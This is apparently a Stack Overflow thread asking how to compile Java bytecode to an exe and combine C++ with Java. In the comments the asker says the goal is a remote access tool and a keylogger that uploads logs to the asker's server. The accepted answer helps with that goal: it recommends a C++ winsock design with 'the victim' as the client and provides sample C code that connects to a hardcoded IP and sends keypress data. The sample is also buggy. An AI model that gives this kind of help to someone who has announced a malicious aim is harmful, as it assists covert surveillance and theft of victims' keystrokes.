# Java bytecode to exe and combing c++ and java

Tags: java, c++

I have read many articles and posts but im still confused how to make/convert bytecode to exe so that it can be run on any standalone machine withour JRE,JVM or any other kind of thing.

What does combining C++ and java Program means?

And if it's possible to combine C++ and Java Program , how to do so?

Comment: Why do you want to run java programs without a JVM?

Comment: Im making some programs like 'rat' and 'keyloggers' in java
SO i want to make it run in standalone machine :)

Comment: @RishabhGoyal: to me java seems the worst possible language for a keylogger.....

Comment: It won't run on "any machine" if you compile it to a native executable.

Comment: Bad technology and bad purpose

Comment: @ Exceptyon
I know even I think like that.
but here my idea is a bit different.
I go a keylogger(standalone) made on C++ and it stores all logs to a specific path.
And through java (TCP/IP or Url Prasing) I want to upload that on my server machine(or free hosting site).
I have got success on a pc with JVM and JRE.
SO i want to make that standalone.
this is just an attempt or a good try :)

Comment: @teodozjan
but good to gain knowledge.

Comment: @ Joshua Barr
So if I compile it to a native executable , what is the advantage.
And Is that not at all possible to convert it to a 'exe' file?

Answer (score 1, accepted):

bytecode to exe so that it can be run on any standalone machine:
I don't think this can be done. Java assembly differs in architecture from x86 assembly. Maybe you can go from java source code to .exe.

Combining C++ and java Program is done via JNI. 
You write a c++ dll using a specific library to convert between java and C datatypes, and call that dll from your java code.

combine C++ and Java Program , how to do so:
http://www.ibm.com/developerworks/java/tutorials/j-jni/section2.html

Best way to do what you want:
Do everything in C++. Your keylogger uses native system calls to get the key state, so it's better if it's written in C/C++, Just learn winsock for C++ to send the data.
The victim will be the client, and you will be the server
http://www.binarytides.com/winsock-socket-programming-tutorial/
See the "Sending Data" section.

Here is some sample code for the client-victim:

```
#include<stdio.h>
#include<winsock2.h>

#pragma comment(lib,"ws2_32.lib") //Winsock Library

int main(int argc , char *argv[])
{
    WSADATA wsa;
    SOCKET s;
    struct sockaddr_in server;
    char *message;

    printf("\nInitialising Winsock...");
    if (WSAStartup(MAKEWORD(2,2),&wsa) != 0)
    {
        printf("Failed. Error Code : %d",WSAGetLastError());
        return 1;
    }

    printf("Initialised.\n");

    //Create a socket
    if((s = socket(AF_INET , SOCK_STREAM , 0 )) == INVALID_SOCKET)
    {
        printf("Could not create socket : %d" , WSAGetLastError());
    }

    printf("Socket created.\n");


    server.sin_addr.s_addr = inet_addr("74.125.235.20"); //your ip here
    server.sin_family = AF_INET;
    server.sin_port = htons( 80 );  //your port here

    //Connect to remote server
    if (connect(s , (struct sockaddr *)&server , sizeof(server)) < 0)
    {
        puts("connect error");
        return 1;
    }

    puts("Connected");

    //Send some data
    char message[128];       
    while(true){ 
        //Check if a key is pressed
        strcpy(message, "Keypressed!");
        send(s , message , strlen(message) , 0)
    }
    closesocket(s);
    WSACleanup();
    return 0;
}
```

Write the server program in java.

Comment: nice but I have some more Programs i.e. really big and I want to call them in my java program.

Comment: how do you add winsock2.h library in turbo c.

Comment: I don't know tis is a windows application written for visual studio compiler

Comment: anyways, thanks for your valuable reply. I'll accept your answer :)

Answer (score 3):

> I have read many articles and posts but im still confused how to
>   make/convert bytecode to exe so that it can be run on any standalone
>   machine withour JRE,JVM or any other kind of thing.

This can be achieved using [GCJ](http://gcc.gnu.org/java/), but is not very common from my experience.  If you are unsure that the target computer will have a JVM installed, you can ship a copy of the JRE with your byte code.

> What does combining C++ and java Program means?

Java can execute native code using [JNI](http://en.wikipedia.org/wiki/Java_Native_Interface).

> And if it's possible to combine C++ and Java Program , how to do so?

As above, you can use JNI.

Comment: according to site 
"GCJ is a portable, optimizing, ahead-of-time compiler for the Java Programming Language. It can compile Java source code to Java bytecode (class files) or directly to native machine code, and Java bytecode to native machine code."

can you say something about native machine code..

Comment: What exactly do you want me to say about it?  It's saying it will generate a binary that can be executed by your operating system without any other interpreters.  If you want to learn about machine code, then I'd suggest getting a book, or enrolling on a CompSci course...

Comment: I want you to say that will that run on windows alone or can be run on mac as well.Does that convert it into ".exe" or what..
And what type of course do you want me to join...

Comment: GCJ will generate an executable that can run on the target operating system.  If you target Windows, then, yes, it will generate an `exe` executable file.  However, that file certainly not be executable on a Mac which has a completely different executable format.  This should fairly basic computer knowledge, even outside of programming.

Comment: It sounds like what you are trying to achieve is well outside of your knowledge.  I would suggest learning more about basic programming and how computers work in general, before diving into low level key logging software.

Comment: Thnx
It seems that you have a great knowledge.
I appreciate your knowledge :)
I could not use AOT compiler(Jet) can you suggest me some videos or book on that

Comment: Have you tried Google?

Answer (score 0):

I'd highly suggest you to separate things and leave them as they are.
If you need a powerful and fast running language, choose C/C++ and make your app entirely using it.
Now if you're after portability fast development/deployment, go for java.

You can also use C# and many other fast-development languages to reach your goal.

Ah, PS: the .JAR/.CLASS files are executable binary files, they just need the framework installed to work properly for Java is managed code such as .NET

Comment: Thanx for your suggestion. But I want to do this just for knowledge.
This is usefull to me bcz I see different :)

Answer (score -1):

see:

http://www.excelsior-usa.com/articles/java-to-exe.html

[Will Jvm make compiled byte code into executable file](https://stackoverflow.com/questions/11771343/will-jvm-make-compiled-byte-code-into-executable-file)

Comment: "In a general case you may not expect that your end users will know what a JRE is, how to check its version, and how to download and install it." - really??

Comment: I have already read the article you have give above.And I could not get success :( bcz I find that complicated...
Do you have some other easy methods or videos to refer?